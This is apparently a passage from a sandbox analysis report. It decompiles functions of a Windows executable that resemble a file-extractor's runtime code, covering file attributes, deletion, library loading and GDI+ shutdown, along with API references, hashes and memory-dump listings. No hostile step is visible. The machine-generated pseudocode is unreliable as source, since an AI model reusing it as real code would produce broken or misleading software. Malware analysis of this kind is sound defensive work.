				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}

0x0101091c
0x01010924
0x00000000
0x01010926
0x0101092b
0x0101092f
0x01010932
0x01010934
0x01010936
0x01010938
0x01010938
0x01010939
0x01010939
0x01010940
0x00000000
0x01010942
0x01010947

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 01010915
GetProcessAffinityMask.KERNEL32(00000000), ref: 0101091C

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: dcea00d9f34aa46e9b10ea3f8545dfdb6dc979d698eac1a138dea8b6fbdde5aa
Instruction ID: ff8316160e8e4bb9a52dbddbe8b66075ac0327b27248680ba2945abd204c94d4
Opcode Fuzzy Hash: dcea00d9f34aa46e9b10ea3f8545dfdb6dc979d698eac1a138dea8b6fbdde5aa
Instruction Fuzzy Hash: 5AE09232A10109BB6F19CAB898249FBB7DEFB0411071441B9B9C6D720CF939DD4187A0

Uniqueness

Uniqueness Score: -1.00%

Function 010279B7, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010279B7(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x010279bc

APIs

Part of subcall function 0102B610: GetEnvironmentStringsW.KERNEL32 ref: 0102B619
Part of subcall function 0102B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102B63C
Part of subcall function 0102B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102B662
Part of subcall function 0102B610: _free.LIBCMT ref: 0102B675
Part of subcall function 0102B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102B684

_free.LIBCMT ref: 010279FD
_free.LIBCMT ref: 01027A04

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 400815659-0
Opcode ID: 6416c12ca267096754e52daa7ded43b513a6f2e9cdb243cf83516c16b1cd63ec
Instruction ID: 847cbe4fdab605471cc10c90725bc76d62c3e1f71cf1d550edc0df0bb14ab7f8
Opcode Fuzzy Hash: 6416c12ca267096754e52daa7ded43b513a6f2e9cdb243cf83516c16b1cd63ec
Instruction Fuzzy Hash: 44E022B3A09A3306D7B2767EAC006EF37849FE2230B100B4BE4E4DB4C1CD68880301A6

Uniqueness

Uniqueness Score: -1.00%

Function 0100A444, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0100A444(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E0101E360();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E0100B66C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}

0x0100a44c
0x0100a451
0x0100a458
0x0100a460
0x0100a465
0x0100a491
0x0100a491
0x0100a49a

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A27A,?,?,?,0100A113,?,00000001,00000000,?,?), ref: 0100A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A27A,?,?,?,0100A113,?,00000001,00000000,?,?), ref: 0100A489

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fefcab5d769bb67065c97f320d290b3dc48ae77a8a9552f5eae5f911804c3b5a
Instruction ID: 1271ae4f80c5b3c135995cc763c589826183726546686a2b0873c079f8577a60
Opcode Fuzzy Hash: fefcab5d769bb67065c97f320d290b3dc48ae77a8a9552f5eae5f911804c3b5a
Instruction Fuzzy Hash: C8F0A03524020DBBEF125E60DC84FDA77ACBB08382F048051BCC886194DB3A89A9AF50

Uniqueness

Uniqueness Score: -1.00%

Function 0101D573, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0101D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 0101D5B8

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 8b267cbb7cbd835d60f91fd6ec87e6824cb025af1e880e38abe478f1afdf8a65
Instruction ID: bb7305728e99617ee5d0e335b4333284ed218508fd6cb223ff4992315d230fa6
Opcode Fuzzy Hash: 8b267cbb7cbd835d60f91fd6ec87e6824cb025af1e880e38abe478f1afdf8a65
Instruction Fuzzy Hash: ACF05C7150034C7BEB22BBF08C05FDD375C9714341F000986B780930E4D93A6A104761

Uniqueness

Uniqueness Score: -1.00%

Function 0100A12D, Relevance: 3.0, APIs: 2, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0100A12D(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E0101E360();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E0100B66C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}

0x0100a135
0x0100a13a
0x0100a13e
0x0100a146
0x0100a14b
0x0100a174
0x0100a174
0x0100a17d

APIs

DeleteFileW.KERNELBASE(?,?,?,0100984C,?,?,01009688,?,?,?,?,01031FA1,000000FF), ref: 0100A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0100984C,?,?,01009688,?,?,?,?,01031FA1,000000FF), ref: 0100A16C

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 3ca2c5020917b2c837add1d1a2a17974d8cbd28fc688de6305ca52250296bcb7
Instruction ID: 3a784939d4e9fe09ae19c624a61b968b74afdc803a10af2683f545d1b1c4098d
Opcode Fuzzy Hash: 3ca2c5020917b2c837add1d1a2a17974d8cbd28fc688de6305ca52250296bcb7
Instruction Fuzzy Hash: 0CE09B3564020967EB125E64DC84FED77ACBB083C2F444065BDC4C7094DB6699949B50

Uniqueness

Uniqueness Score: -1.00%

Function 0101A39D, Relevance: 3.0, APIs: 2, Instructions: 27
comCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0101A39D(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t8;
				void* _t13;
				void* _t16;
				intOrPtr _t19;

				 *[fs:0x0] = _t19;
				_t5 =  *0x1048430; // 0x73e7c100
				 *0x1033260(_t5, _t13, _t16,  *[fs:0x0], E01031FA1, 0xffffffff);
				 *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))();
				L0101E244(); // executed
				_t8 =  *0x1062170( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t8;
			}

0x0101a3ae
0x0101a3b5
0x0101a3c6
0x0101a3cc
0x0101a3d1
0x0101a3d6
0x0101a3e0
0x0101a3eb

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,01031FA1,000000FF), ref: 0101A3D1
OleUninitialize.OLE32(?,?,?,?,01031FA1,000000FF), ref: 0101A3D6

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: da7ea88b3553674721a7d9622394f1b31db55a65c32eaa7c5dc61e38ab6848be
Instruction ID: a9b60f15465d56bc850e08ce65cab09bad274a190f7f3f0326ffaf1eaf79ba92
Opcode Fuzzy Hash: da7ea88b3553674721a7d9622394f1b31db55a65c32eaa7c5dc61e38ab6848be
Instruction Fuzzy Hash: 81F0ED32608604EFC720EB4CD841B49FBACFB88A20F00436AF80983750CB7A6800CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0100A194, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100A194(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E0101E360();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E0100B66C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}

0x0100a19c
0x0100a1a5
0x0100a1ab
0x0100a1b0
0x0100a1d1
0x0100a1d7
0x0100a1d7
0x0100a1df

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0100A189,?,010076B2,?,?,?,?), ref: 0100A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0100A189,?,010076B2,?,?,?,?), ref: 0100A1D1

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 72c393ad6d16f97841c93091c1d2736ae9c9186fa636e4d381f0887bebecc572
Instruction ID: a704b5ce2c64610bf0c576f43344376454208835653dc51757245d6303de4788
Opcode Fuzzy Hash: 72c393ad6d16f97841c93091c1d2736ae9c9186fa636e4d381f0887bebecc572
Instruction Fuzzy Hash: A3E09B3550011897EB22AA68DC04BD9B79CEB0D3E1F0041A1FDC4D71D4D6759D449BD0

Uniqueness

Uniqueness Score: -1.00%

Function 01010085, Relevance: 3.0, APIs: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01010085(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E0101E360();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E0100B965( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}

0x0101008d
0x010100a0
0x010100a8
0x010100b6
0x010100c2
0x010100c2
0x010100cc

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 010100A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100EB86,Crypt32.dll,00000000,0100EC0A,?,?,0100EBEC,?,?,?), ref: 010100C2

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: b9f46e1f7625167c05755fb3ada72c80891bcb2e44ece51830191ed9e8e8a37d
Instruction ID: d83736d1a5ca93ae0fca4900d67112f180de37123ca09dc76a48c5c736ef1939
Opcode Fuzzy Hash: b9f46e1f7625167c05755fb3ada72c80891bcb2e44ece51830191ed9e8e8a37d
Instruction Fuzzy Hash: 77E0417550111C67DB319694DC44FD6B76CFF1D391F040095B984D3148D679D684CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 01019B0F, Relevance: 3.0, APIs: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E01019B0F(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x1034670;
				if(_a8 == 0) {
					L0101E22C(); // executed
				} else {
					L0101E232();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x01019b12
0x01019b14
0x01019b16
0x01019b19
0x01019b1c
0x01019b24
0x01019b25
0x01019b28
0x01019b2e
0x01019b37
0x01019b30
0x01019b30
0x01019b30
0x01019b3c
0x01019b42
0x01019b4b

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 01019B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 01019B37

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 4b8b4a50e5641592657f57f4fa75cccab9e9717cd6ba4a0d74d092b92f2c4c61
Instruction ID: d04eb0c5e3d94324cc140727570f7614d4b7a82dfc2fbb5931879373d4210cb7
Opcode Fuzzy Hash: 4b8b4a50e5641592657f57f4fa75cccab9e9717cd6ba4a0d74d092b92f2c4c61
Instruction Fuzzy Hash: 52E06D71801208EFCB10DF98D5406DDBBE8FB08220F10805BECC493204D274AE00DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0102215C, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0102215C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E0102329A(__eflags, E010220A0); // executed
				 *0x103e680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E01023348(__eflags, _t1, 0x1061054);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E0102218F(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x01022161
0x01022166
0x0102216f
0x0102217a
0x01022180
0x01022181
0x01022183
0x0102218e
0x01022185
0x01022185
0x00000000
0x01022185
0x01022171
0x01022171
0x01022173
0x01022173

APIs

Part of subcall function 0102329A: try_get_function.LIBVCRUNTIME ref: 010232AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0102217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01022185

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: acdb75a6e099bb1bd7de8a939324b85f26cca045707ee731df89ce29762c9589
Instruction ID: fd6393a84447f391ed43bafd3395166dd3db719ab97e20685b27cff0127917c5
Opcode Fuzzy Hash: acdb75a6e099bb1bd7de8a939324b85f26cca045707ee731df89ce29762c9589
Instruction Fuzzy Hash: 87D0223C604333343D9826F82881EEC238968BA9B03F00B8AE3E0CE0D1EF298004A112

Uniqueness

Uniqueness Score: -1.00%

Function 0101DC67, Relevance: 3.0, APIs: 2, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 30%

			E0101DC67(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t5;
				intOrPtr _t8;
				signed int _t9;
				void* _t16;
				void* _t20;
				signed int _t26;

				_t20 = __esi;
				_t16 = __ecx;
				if(( *0x1035560 & 0x00001000) == 0) {
					return _t5;
				} else {
					E0101DD15(__ecx, __esi);
					_t8 =  *0x1060ce0 + 1;
					 *0x1060ce0 = _t8;
					if(_t8 == 1) {
						E0101DE67(4, 0x1060ce4); // executed
					}
					_t24 = _t26;
					_push(_t16);
					_t9 =  *0x103e668; // 0x7ecdc17e
					_v8 = _t9 ^ _t26;
					if(E0101DC9A() == 0) {
						 *0x1060cdc = 0;
					} else {
						 *0x1033260(0x1060cdc, _t20);
						 *((intOrPtr*)( *0x1060cd8))();
					}
					return E0101EC4A(_v8 ^ _t24);
				}
			}

0x0101dc67
0x0101dc67
0x0101dc71
0x0101dc99
0x0101dc73
0x0101dc73
0x0101dc7d
0x0101dc7e
0x0101dc86
0x0101dc8f
0x0101dc8f
0x0101df12
0x0101df14
0x0101df15
0x0101df1c
0x0101df26
0x0101df41
0x0101df28
0x0101df36
0x0101df3c
0x0101df3e
0x0101df58
0x0101df58

APIs

DloadLock.DELAYIMP ref: 0101DC73
DloadProtectSection.DELAYIMP ref: 0101DC8F

Part of subcall function 0101DE67: DloadObtainSection.DELAYIMP ref: 0101DE77

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: b6a714f714feb8b00c2b77219c8278710b24ef3876476661ec5ce1d9cd248697
Instruction ID: b0b45343f17170d6423d9139a124fb0eea865061edf4a022d546bbfff12a140b
Opcode Fuzzy Hash: b6a714f714feb8b00c2b77219c8278710b24ef3876476661ec5ce1d9cd248697
Instruction Fuzzy Hash: 6DD0C97018030A4AD665BB98D55D79C32B4B714758F940845F1C5C60ACDFAE5080C705

Uniqueness

Uniqueness Score: -1.00%

Function 010012E6, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E010012E6(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x010012ed
0x01001302
0x01001308

APIs

GetDlgItem.USER32(?,?), ref: 010012FB
ShowWindow.USER32(00000000), ref: 01001302

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 9a4025441250cb47c9713aa627bbd4f2e5d92cd9a9ac3e8908c3a9a07626043b
Instruction ID: 20ead82fce2fb660eade4425a2e9f87a7a5debc49e0f0cc7257d19c6536e09f6
Opcode Fuzzy Hash: 9a4025441250cb47c9713aa627bbd4f2e5d92cd9a9ac3e8908c3a9a07626043b
Instruction Fuzzy Hash: ACC0123A05C200FFCB010BB0DC09D2FBBA8ABA5212F05C908F2E5C0064C23EC010DB11

Uniqueness

Uniqueness Score: -1.00%

Function 010019A6, Relevance: 1.8, APIs: 1, Instructions: 310
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E010019A6(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t140;
				intOrPtr _t146;
				signed int _t147;
				signed int _t148;
				void* _t151;
				signed int _t156;
				signed int _t160;
				void* _t165;
				void* _t167;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t174;
				signed int _t184;
				void* _t185;
				signed int _t187;
				char* _t202;
				intOrPtr _t203;
				signed int _t204;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				char* _t218;
				intOrPtr _t219;
				void* _t220;
				void* _t227;
				void* _t229;

				_t213 = __edx;
				_t174 = __ecx;
				E0101E28C(E01031CB9, _t229);
				_t172 = _t174;
				_t215 = _t172 + 0x21f8;
				 *((char*)(_t172 + 0x6cbc)) = 0;
				 *((char*)(_t172 + 0x6cc4)) = 0;
				 *0x1033260(_t215, 7, _t214, _t220, _t171);
				if( *( *( *_t172 + 0xc))() == 7) {
					_t222 = 0;
					 *(_t172 + 0x6cc0) = 0;
					_t103 = E01001DA8(_t215, 7);
					__eflags = _t103;
					if(_t103 == 0) {
						E0100709D(_t229 - 0x38, 0x200000);
						 *(_t229 - 4) = 0;
						 *0x1033260();
						_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
						 *((intOrPtr*)(_t229 - 0x18)) = _t107;
						 *0x1033260( *((intOrPtr*)(_t229 - 0x38)),  *((intOrPtr*)(_t229 - 0x34)) + 0xfffffff0);
						_t109 =  *( *_t172 + 0xc)();
						_t184 = _t109;
						_t222 = 0;
						 *(_t229 - 0x14) = _t184;
						__eflags = _t184;
						if(_t184 <= 0) {
							L22:
